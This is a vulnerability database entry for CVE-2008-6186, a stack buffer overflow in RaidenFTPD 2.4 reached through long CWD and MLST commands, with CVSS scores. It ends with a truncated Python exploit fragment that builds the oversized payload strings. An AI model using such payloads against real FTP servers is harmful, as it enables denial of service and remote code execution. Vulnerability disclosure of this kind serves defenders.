9
CVSSv2

CVE-2008-6186

Published: 19/02/2009 Updated: 29/09/2017
CVSS v2 Base Score: 9 | Impact Score: 10 | Exploitability Score: 8
VMScore: 905
Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C

Vulnerability Summary

Stack-based buffer overflow in RaidenFTPD 2.4 build 3620 allows remote authenticated users to cause a denial of service (crash) or execute arbitrary code via long (1) CWD and (2) MLST commands.

Vulnerable Product Search on Vulmon Subscribe to Product

raidenftpd raidenftpd 2.4

Exploits

# RaidenFTPD V24 build 3620 exploit # probaly heap overflow # # (x)dmnt 2008 # -*- coding: windows-1252 -*- import socket import sys, time evil_cwd = "/"+"\x22"*255 evil_dir = "X"*505 def help_info(): print ("Usage: ShaoKahn <host> <login> <password>\n") print ("Note: anonymous is enought") def dos_it(hostname, userna ...